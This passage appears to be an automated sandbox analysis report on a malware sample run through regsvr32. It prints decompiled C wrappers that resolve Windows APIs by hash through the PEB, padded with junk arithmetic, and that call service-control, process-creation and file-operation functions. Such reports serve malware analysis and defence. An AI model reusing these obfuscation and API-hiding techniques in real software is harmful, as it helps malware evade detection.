5041->5063 5042->5041 5044 28b184 GetPEB 5042->5044 5045 28da65 5042->5045 5059 291c3c 5042->5059 5044->5042 5045->4103 5048 289425 5046->5048 5047 284bb4 2 API calls 5047->5048 5048->5047 5049 283f09 GetPEB 5048->5049 5050 28954c 5048->5050 5053 28954a 5048->5053 5054 28b9d7 GetPEB 5048->5054 5067 29462a 5048->5067 5049->5048 5051 283152 GetPEB 5050->5051 5051->5053 5053->4103 5054->5048 5056 28f6e5 5055->5056 5057 29bff0 GetPEB 5056->5057 5058 28f778 5057->5058 5058->4112 5060 291c5e 5059->5060 5061 29bff0 GetPEB 5060->5061 5062 291d0f 5061->5062 5062->5042 5064 28ff24 5063->5064 5065 29bff0 GetPEB 5064->5065 5066 28ffca 5065->5066 5066->5045 5068 294649 5067->5068 5069 29bff0 GetPEB 5068->5069 5070 2946d3 5069->5070 5070->5048 5114 285c9a 5123 28617c 5114->5123 5115 286a8d GetPEB 5115->5123 5116 29bf1c 2 API calls 5116->5123 5117 28638d 5118 289574 GetPEB 5118->5123 5120 28638f 5121 29e373 2 API calls 5120->5121 5121->5117 5122 28ffde GetPEB 5122->5123 5123->5115 5123->5116 5123->5117 5123->5118 5123->5120 5123->5122 5124 29eaa3 2 API calls 5123->5124 5126 29589f GetPEB 5123->5126 5127 29ab39 5123->5127 5131 2a2727 5123->5131 5124->5123 5126->5123 5128 29ab6c 5127->5128 5129 29bff0 GetPEB 5128->5129 5130 29ac10 5129->5130 5130->5123 5132 2a2737 5131->5132 5133 29bff0 GetPEB 5132->5133 5134 2a27d3 5133->5134 5134->5123 5097 2872cc 5098 28ffde GetPEB 5097->5098 5099 28750d 5098->5099 5110 29589f 5099->5110 5102 284bb4 2 API calls 5103 28753e 5102->5103 5104 29734a GetPEB 5103->5104 5105 287568 5104->5105 5106 28b9d7 GetPEB 5105->5106 5107 287577 5106->5107 5108 289ea8 2 API calls 5107->5108 5109 28758b 5108->5109 5111 2958b2 5110->5111 5112 29bff0 GetPEB 5111->5112 5113 287520 5112->5113 5113->5102 5113->5109 5071 2963f0 5072 29641e 5071->5072 5073 28b184 GetPEB 5072->5073 5074 29663b 5073->5074 5075 2946e0 2 API calls 5074->5075 5076 296676 5075->5076 5077 296683 5076->5077 5078 29e373 2 API calls 5076->5078 5079 2966a3 5078->5079 5080 29e373 2 API calls 
5079->5080 5080->5077 5081 2888e5 5083 288a5e 5081->5083 5082 288aa9 5083->5082 5084 29e18b 2 API calls 5083->5084 5085 288a79 5084->5085 5089 2908c0 5085->5089 5088 28b9d7 GetPEB 5088->5082 5092 2908e5 5089->5092 5090 288a91 5090->5088 5092->5090 5093 2919a4 5092->5093 5094 2919bd 5093->5094 5095 29bff0 GetPEB 5094->5095 5096 291a63 5095->5096 5096->5092
C-Code - Quality: 58%
E0028F1D5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
    signed int _v8;
    unsigned int _v12;
    unsigned int _v16;
    signed int _v20;
    intOrPtr _v24;
    intOrPtr _v28;
    intOrPtr _v32;
    intOrPtr _v36;
    void* _t49;
    intOrPtr* _t58;
    void* _t59;
    signed int _t62;
    void* _t67;
    void* _t68;

    _t68 = __edx;
    _t67 = __ecx;
    E00289E7D(_t49);
    _v36 = 0xea873e;
    _v32 = 0xb2392b;
    _v28 = 0;
    _v24 = 0;
    _v12 = 0xdc192d;
    _v12 = _v12 >> 0xa;
    _v12 = _v12 >> 0xf;
    _v12 = _v12 + 0x11b5;
    _v12 = _v12 ^ 0x0007f5c7;
    _v20 = 0x6dcef4;
    _t62 = 0x6b;
    _v20 = _v20 * 0x54;
    _v20 = _v20 << 0x10;
    _v20 = _v20 ^ 0xe81a0a50;
    _v16 = 0x9ccfab;
    _v16 = _v16 | 0xc76ed5d6;
    _v16 = _v16 >> 0xf;
    _v16 = _v16 ^ 0x000c5bda;
    _v8 = 0xcca784;
    _v8 = _v8 / _t62;
    _v8 = _v8 >> 0xf;
    _v8 = _v8 ^ 0x01549e3f;
    _v8 = _v8 ^ 0x01571d5c;
    _t58 = E0029BFF0(0xac802c42, 0x317, _t62, _t62, 0x42a4b2ae);
    _t59 = *_t58(_t67, 0, _t68, 0x28, __ecx, __edx, _a4, _a8, 0, _a16, _a20, 0x28); // executed
    return _t59;
}

                                                                                                                APIs
                                                                                                                • SetFileInformationByHandle.KERNEL32(00000000,00000000,?,00000028,?,?,?,?,?,?,?,?,00000028,00000000,0000002C,00000000), ref: 0028F2B0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.449723036.0000000000281000.00000020.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.449718656.0000000000280000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000004.00000002.449926106.00000000002A4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_280000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileHandleInformation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3935143524-0
                                                                                                                • Opcode ID: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
                                                                                                                • Instruction ID: e2465403569062875c2ede7694c2b589caeb19cf62f37267c1561337926b1488
                                                                                                                • Opcode Fuzzy Hash: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
                                                                                                                • Instruction Fuzzy Hash: 4C2144B5D0121DAFDB08DFA5C88A8EEBBB4FB44708F10809DE515AA240C7B45B54DFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 498 2832b5-28338a call 289e7d call 29bff0 OpenSCManagerW
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E002832B5(void* __ecx, void* __edx, int _a4, intOrPtr _a12) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				short* _v24;
                                                                                                                				short* _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				void* _t49;
                                                                                                                				void* _t62;
                                                                                                                				signed int _t64;
                                                                                                                				signed int _t65;
                                                                                                                
                                                                                                                				_push(0);
                                                                                                                				_push(_a12);
                                                                                                                				_push(0);
                                                                                                                				_push(_a4);
                                                                                                                				E00289E7D(_t49);
                                                                                                                				_v32 = 0xf329ca;
                                                                                                                				_v28 = 0;
                                                                                                                				_v24 = 0;
                                                                                                                				_v16 = 0x2373b;
                                                                                                                				_t64 = 0x7a;
                                                                                                                				_v16 = _v16 * 0x75;
                                                                                                                				_t65 = 0x3d;
                                                                                                                				_v16 = _v16 / _t64;
                                                                                                                				_v16 = _v16 ^ 0x00061266;
                                                                                                                				_v12 = 0xb7be71;
                                                                                                                				_v12 = _v12 >> 0xb;
                                                                                                                				_v12 = _v12 + 0xafdb;
                                                                                                                				_v12 = _v12 ^ 0x7920a4e8;
                                                                                                                				_v12 = _v12 ^ 0x79205c77;
                                                                                                                				_v8 = 0x1abc5;
                                                                                                                				_v8 = _v8 / _t65;
                                                                                                                				_v8 = _v8 << 0xb;
                                                                                                                				_v8 = _v8 ^ 0x07f89b39;
                                                                                                                				_v8 = _v8 ^ 0x07caeaee;
                                                                                                                				_v20 = 0x49b926;
                                                                                                                				_v20 = _v20 * 0x47;
                                                                                                                				_v20 = _v20 ^ 0x147483b3;
                                                                                                                				E0029BFF0(0x11de522c, 0x30d, _t65, _t65, 0xea9607);
                                                                                                                				_t62 = OpenSCManagerW(0, 0, _a4); // executed
                                                                                                                				return _t62;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,79205C77,?,?,?,?,?,?,?,?,00000000), ref: 00283384
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.449723036.0000000000281000.00000020.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.449718656.0000000000280000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000004.00000002.449926106.00000000002A4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_280000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ManagerOpen
                                                                                                                • String ID: w\ y
                                                                                                                • API String ID: 1889721586-240614871
                                                                                                                • Opcode ID: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
                                                                                                                • Instruction ID: 3eb39d8c2b30a9b3b832e566e5655433278e0da0ebee8117d3abc05228d69ea6
                                                                                                                • Opcode Fuzzy Hash: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
                                                                                                                • Instruction Fuzzy Hash: 6D2123B5D01228FBCB04DFA9D84A9EEBFB5FB40304F208189E424A6250D3B55B40DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 503 28c4eb-28c5c2 call 289e7d call 29bff0 OpenServiceW
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E0028C4EB(void* __ecx, int __edx, short* _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				void* _t46;
                                                                                                                				void* _t54;
                                                                                                                				int _t58;
                                                                                                                
                                                                                                                				_push(_a16);
                                                                                                                				_t58 = __edx;
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E00289E7D(_t46);
                                                                                                                				_v24 = _v24 & 0x00000000;
                                                                                                                				_v36 = 0xd40f1;
                                                                                                                				_v32 = 0xcb52a0;
                                                                                                                				_v28 = 0x146fa1;
                                                                                                                				_v20 = 0xb8dab7;
                                                                                                                				_v20 = _v20 >> 1;
                                                                                                                				_v20 = _v20 << 5;
                                                                                                                				_v20 = _v20 ^ 0x0b80f677;
                                                                                                                				_v8 = 0x87dd92;
                                                                                                                				_v8 = _v8 + 0xffffe9d3;
                                                                                                                				_v8 = _v8 * 0x55;
                                                                                                                				_v8 = _v8 << 0xa;
                                                                                                                				_v8 = _v8 ^ 0x54d92ec5;
                                                                                                                				_v16 = 0xb88fea;
                                                                                                                				_v16 = _v16 | 0xf85cd4fd;
                                                                                                                				_v16 = _v16 + 0xed22;
                                                                                                                				_v16 = _v16 ^ 0xf8f0d6dc;
                                                                                                                				_v12 = 0x2c3d87;
                                                                                                                				_v12 = _v12 + 0x3690;
                                                                                                                				_v12 = _v12 + 0xfffff048;
                                                                                                                				_v12 = _v12 ^ 0x0029d00c;
                                                                                                                				E0029BFF0(0x11de522c, 0xe1, __ecx, __ecx, 0x5fb2da2f);
                                                                                                                				_t54 = OpenServiceW(_a8, _a4, _t58); // executed
                                                                                                                				return _t54;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • OpenServiceW.ADVAPI32(F8F0D6DC,0029D00C,?,?,?,?,?,?,?,?,?,?), ref: 0028C5BC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.449723036.0000000000281000.00000020.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.449718656.0000000000280000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000004.00000002.449926106.00000000002A4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_280000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: OpenService
                                                                                                                • String ID: "
                                                                                                                • API String ID: 3098006287-1598837362
                                                                                                                • Opcode ID: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
                                                                                                                • Instruction ID: 2d5a3be4876718a58e88aae66b74ee29f2d9bd3171ba26231cab08e1a53901c1
                                                                                                                • Opcode Fuzzy Hash: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
                                                                                                                • Instruction Fuzzy Hash: 8A2120B6C1120DEBCF15DFA4D9499EEBBB4FF04318F108598E92566260E3B25B14DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 508 29a98e-29aa51 call 289e7d call 29bff0 CloseServiceHandle
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E0029A98E(void* __ecx, void* __edx, void* _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t45;
                                                                                                                				int _t58;
                                                                                                                				signed int _t60;
                                                                                                                				signed int _t61;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				E00289E7D(_t45);
                                                                                                                				_v24 = _v24 & 0x00000000;
                                                                                                                				_v28 = 0xdfb18c;
                                                                                                                				_v12 = 0xac05d3;
                                                                                                                				_v12 = _v12 + 0xffffe692;
                                                                                                                				_t60 = 6;
                                                                                                                				_v12 = _v12 * 0xa;
                                                                                                                				_v12 = _v12 ^ 0x06b0bc77;
                                                                                                                				_v20 = 0xcbcea5;
                                                                                                                				_t61 = 0x73;
                                                                                                                				_v20 = _v20 / _t60;
                                                                                                                				_v20 = _v20 ^ 0x0026c0c8;
                                                                                                                				_v16 = 0x706a69;
                                                                                                                				_v16 = _v16 + 0xffff322e;
                                                                                                                				_v16 = _v16 ^ 0x006745ff;
                                                                                                                				_v8 = 0xc7f3e7;
                                                                                                                				_v8 = _v8 * 0x7b;
                                                                                                                				_v8 = _v8 + 0xffffee1e;
                                                                                                                				_v8 = _v8 / _t61;
                                                                                                                				_v8 = _v8 ^ 0x00d4d133;
                                                                                                                				E0029BFF0(0x11de522c, 0x223, _t61, _t61, 0x2fdf0f26);
                                                                                                                				_t58 = CloseServiceHandle(_a4); // executed
                                                                                                                				return _t58;
                                                                                                                			}


                                                                                                                APIs
                                                                                                                • CloseServiceHandle.ADVAPI32(06B0BC77,?,?,?,?,?,?,?,?), ref: 0029AA4C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.449723036.0000000000281000.00000020.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.449718656.0000000000280000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000004.00000002.449926106.00000000002A4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_280000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleService
                                                                                                                • String ID: ijp
                                                                                                                • API String ID: 1725840886-2001787820
                                                                                                                • Opcode ID: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
                                                                                                                • Instruction ID: 11025f1030301430edca81d58f83a8729e5e47c4f7176187500e46e1e50bc6aa
                                                                                                                • Opcode Fuzzy Hash: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
                                                                                                                • Instruction Fuzzy Hash: CB2117B5D0520DFBEF04DFA4D98A9AEBBB1EB40304F10C19AE404AB250D7B59B549F84
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 513 28338b-283454 call 289e7d call 29bff0 SHFileOperationW
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E0028338B(void* __ecx, void* __edx, struct _SHFILEOPSTRUCTW* _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				void* _t46;
                                                                                                                				int _t58;
                                                                                                                				signed int _t60;
                                                                                                                
                                                                                                                				_push(_a4);
                                                                                                                				E00289E7D(_t46);
                                                                                                                				_v28 = _v28 & 0x00000000;
                                                                                                                				_v24 = _v24 & 0x00000000;
                                                                                                                				_v32 = 0x221b15;
                                                                                                                				_v20 = 0x156690;
                                                                                                                				_t60 = 5;
                                                                                                                				_v20 = _v20 * 0x69;
                                                                                                                				_v20 = _v20 ^ 0x08c90ac4;
                                                                                                                				_v12 = 0x1a8107;
                                                                                                                				_v12 = _v12 / _t60;
                                                                                                                				_v12 = _v12 | 0x5e0d12b3;
                                                                                                                				_v12 = _v12 * 0x36;
                                                                                                                				_v12 = _v12 ^ 0xd6d73012;
                                                                                                                				_v8 = 0x305b7c;
                                                                                                                				_v8 = _v8 + 0xffffaa6a;
                                                                                                                				_v8 = _v8 << 0xf;
                                                                                                                				_v8 = _v8 | 0xeac0b19d;
                                                                                                                				_v8 = _v8 ^ 0xeaf3a664;
                                                                                                                				_v16 = 0x5b8d10;
                                                                                                                				_v16 = _v16 * 0x69;
                                                                                                                				_v16 = _v16 + 0x95d4;
                                                                                                                				_v16 = _v16 ^ 0x258da45e;
                                                                                                                				E0029BFF0(0xee7aaf55, 0x302, _t60, _t60, 0x2f7a8b42);
                                                                                                                				_t58 = SHFileOperationW(_a4); // executed
                                                                                                                				return _t58;
                                                                                                                			}


                                                                                                                APIs
                                                                                                                • SHFileOperationW.SHELL32(D6D73012,?,?,?,?,?,?,?), ref: 0028344F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.449723036.0000000000281000.00000020.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.449718656.0000000000280000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000004.00000002.449926106.00000000002A4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_280000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileOperation
                                                                                                                • String ID: |[0
                                                                                                                • API String ID: 3080627654-3711761429
                                                                                                                • Opcode ID: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
                                                                                                                • Instruction ID: b71c036e68771700f23c09e3bf1d9a251fe517aa64e538928bd2110e4a7ef540
                                                                                                                • Opcode Fuzzy Hash: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
                                                                                                                • Instruction Fuzzy Hash: ED2136B4D01209EFCF04DFA5C94AAEEBFB4FB00304F108189E424AA290D7B96B548F90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 85%
                                                                                                                			E0029E373(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t41;
                                                                                                                				int _t51;
                                                                                                                				signed int _t53;
                                                                                                                				void* _t58;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t58 = __edx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				E00289E7D(_t41);
                                                                                                                				_v20 = 0xc362e1;
                                                                                                                				_v20 = _v20 + 0xffff2419;
                                                                                                                				_v20 = _v20 + 0xffff15b9;
                                                                                                                				_v20 = _v20 ^ 0x00c90db5;
                                                                                                                				_v16 = 0x370fa8;
                                                                                                                				_v16 = _v16 + 0x3ddc;
                                                                                                                				_v16 = _v16 + 0xfffffca4;
                                                                                                                				_v16 = _v16 ^ 0x003af0ce;
                                                                                                                				_v8 = 0x58cda3;
                                                                                                                				_t53 = 0x37;
                                                                                                                				_v8 = _v8 / _t53;
                                                                                                                				_v8 = _v8 | 0xee3498e5;
                                                                                                                				_v8 = _v8 + 0xffff3fab;
                                                                                                                				_v8 = _v8 ^ 0xee3595ac;
                                                                                                                				_v12 = 0xe7384d;
                                                                                                                				_v12 = _v12 + 0x2a59;
                                                                                                                				_v12 = _v12 * 0x31;
                                                                                                                				_v12 = _v12 ^ 0x2c4bf561;
                                                                                                                				E0029BFF0(0xac802c42, 0x278, _t53, _t53, 0x298e9f43);
                                                                                                                				_t51 = CloseHandle(_t58); // executed
                                                                                                                				return _t51;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00293F2A,00000000), ref: 0029E42F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.449723036.0000000000281000.00000020.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.449718656.0000000000280000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000004.00000002.449926106.00000000002A4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_280000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID: M8
                                                                                                                • API String ID: 2962429428-669864304
                                                                                                                • Opcode ID: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
                                                                                                                • Instruction ID: 9438e68d86052ed98a0c32da5f9a635733fcc266b86faeb3d92ca123c8057eb9
                                                                                                                • Opcode Fuzzy Hash: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
                                                                                                                • Instruction Fuzzy Hash: 7D1159B5D10209FFDF58DFA4C94989EBBB4EB40324F108299E824B6290D7B55B158F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 43%
                                                                                                                			E002946E0(void* __ecx, struct _PROCESS_INFORMATION* __edx, long _a8, intOrPtr _a12, struct _STARTUPINFOW* _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, WCHAR* _a40, intOrPtr _a44, int _a48, intOrPtr _a56, intOrPtr _a60, WCHAR* _a64, intOrPtr _a68) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t55;
                                                                                                                				int _t64;
                                                                                                                				signed int _t66;
                                                                                                                				struct _PROCESS_INFORMATION* _t72;
                                                                                                                
                                                                                                                				_push(_a68);
                                                                                                                				_t72 = __edx;
                                                                                                                				_push(_a64);
                                                                                                                				_push(_a60);
                                                                                                                				_push(_a56);
                                                                                                                				_push(0);
                                                                                                                				_push(_a48);
                                                                                                                				_push(_a44);
                                                                                                                				_push(_a40);
                                                                                                                				_push(0);
                                                                                                                				_push(_a32);
                                                                                                                				_push(_a28);
                                                                                                                				_push(_a24);
                                                                                                                				_push(0);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(0);
                                                                                                                				_push(__edx);
                                                                                                                				E00289E7D(_t55);
                                                                                                                				_v8 = 0x728488;
                                                                                                                				_v8 = _v8 + 0x86b5;
                                                                                                                				_v8 = _v8 << 0xb;
                                                                                                                				_v8 = _v8 + 0xe7c2;
                                                                                                                				_v8 = _v8 ^ 0x98526b3c;
                                                                                                                				_v16 = 0xdd86ac;
                                                                                                                				_v16 = _v16 | 0x9093749e;
                                                                                                                				_v16 = _v16 + 0x773d;
                                                                                                                				_v16 = _v16 ^ 0x90e3102d;
                                                                                                                				_v20 = 0xa04379;
                                                                                                                				_v20 = _v20 + 0xe8c2;
                                                                                                                				_v20 = _v20 ^ 0x00a70f96;
                                                                                                                				_v12 = 0x20815c;
                                                                                                                				_t66 = 0x4c;
                                                                                                                				_v12 = _v12 / _t66;
                                                                                                                				_v12 = _v12 | 0xbbf973da;
                                                                                                                				_v12 = _v12 ^ 0xbbf5b48f;
                                                                                                                				E0029BFF0(0xac802c42, 0x58, _t66, _t66, 0xb43c22a7);
                                                                                                                				_t64 = CreateProcessW(_a64, _a40, 0, 0, _a48, _a8, 0, 0, _a16, _t72); // executed
                                                                                                                				return _t64;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,90E3102D,00000000,00000000,00000000), ref: 002947CA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.449723036.0000000000281000.00000020.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.449718656.0000000000280000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000004.00000002.449926106.00000000002A4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_280000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
                                                                                                                • Instruction ID: 269b59916201d1e24b09adaaed31c08dff0b1240df90314d426221e4d5214109
                                                                                                                • Opcode Fuzzy Hash: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
                                                                                                                • Instruction Fuzzy Hash: CA31F272900248FBDF559F95DD09CDEBF76FB89314F008188FA2462160D7B69A60EF60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 55%
                                                                                                                			E0029BF1C(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, WCHAR* _a20, long _a24, long _a36, intOrPtr _a40) {
                                                                                                                				unsigned int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t47;
                                                                                                                				void* _t55;
                                                                                                                				long _t60;
                                                                                                                
                                                                                                                				_push(_a40);
                                                                                                                				_t60 = __edx;
                                                                                                                				_push(_a36);
                                                                                                                				_push(0);
                                                                                                                				_push(0);
                                                                                                                				_push(_a24);
                                                                                                                				_push(_a20);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E00289E7D(_t47);
                                                                                                                				_v20 = 0x8eb723;
                                                                                                                				_v20 = _v20 + 0xdb15;
                                                                                                                				_v20 = _v20 ^ 0x00852a30;
                                                                                                                				_v16 = 0x113147;
                                                                                                                				_v16 = _v16 >> 0xc;
                                                                                                                				_v16 = _v16 << 0xa;
                                                                                                                				_v16 = _v16 ^ 0x0008263d;
                                                                                                                				_v12 = 0x276480;
                                                                                                                				_v12 = _v12 + 0x6f6f;
                                                                                                                				_v12 = _v12 | 0x7ba60f09;
                                                                                                                				_v12 = _v12 * 0x1e;
                                                                                                                				_v12 = _v12 ^ 0x7da9aca6;
                                                                                                                				_v8 = 0x62f42b;
                                                                                                                				_v8 = _v8 >> 0xc;
                                                                                                                				_v8 = _v8 << 3;
                                                                                                                				_v8 = _v8 >> 3;
                                                                                                                				_v8 = _v8 ^ 0x000dc6a5;
                                                                                                                				E0029BFF0(0xac802c42, 0xfa, __ecx, __ecx, 0xbf3d9e5c);
                                                                                                                				_t55 = CreateFileW(_a20, _a36, _a12, 0, _t60, _a24, 0); // executed
                                                                                                                				return _t55;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,?,00852A30,00000000,00050E56,?,00000000), ref: 0029BFE8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.449723036.0000000000281000.00000020.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.449718656.0000000000280000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000004.00000002.449926106.00000000002A4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_280000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
                                                                                                                • Instruction ID: 81191f358b7e4b870692533ca05ca98a7dddaca6de247871ec78f55bd9d2aee5
                                                                                                                • Opcode Fuzzy Hash: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
                                                                                                                • Instruction Fuzzy Hash: D221057681020DBBCF15DF96D9098DFBFB5FB84748F008198F925A2220D3B28A64DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00291B22(long __ecx, void* __edx, intOrPtr _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
